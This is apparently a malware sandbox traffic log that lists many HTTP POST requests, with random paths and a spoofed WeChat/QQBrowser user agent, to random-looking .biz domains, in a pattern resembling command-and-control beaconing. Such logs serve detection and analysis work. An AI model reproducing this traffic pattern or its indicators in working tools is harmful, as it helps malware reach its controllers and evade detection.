                    Source: global trafficHTTP traffic detected: POST /ngmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hunwmwyhqkxby HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ehsrasnoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /mmajvqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vudapeuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qirifxoxiwrelcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vhuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vjfojjg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bbdsvdesg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fvijpyejxccmhfmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /tcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qwnv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /npkowol HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kjhhbldlylrmqyc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wufabwul HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bjmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fcyfmvndcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qtsndkyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pnuofhgyvs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /pwpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hcvbujevnkcp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sksexgcippwxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /esxyeqyttv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vjmsosrx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /poiwrabuiumompma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vtpac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nurhntuqrhttbayt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qxbbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vhxrnsynbee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tgkqrcfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /gajxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xcjwbjksxdykmrix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jarjdamitgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ndn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qdigkbbwou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jvsdbpglagvynifq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /yeixpxtqdbgl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xprpgfukortnennm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ikjsulgnyvsnqbkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qreituwftfkkmoci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /khex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /egrsifwbddhrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cwfkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ajjoevhbwow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vpr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dksfjxhedmgidb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lelrjltwmlswd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jgidxganmacktd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /venn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /rqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nipbgjpspvtyfe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /px HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nsbfgtgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /eqkqtlekx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /shr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
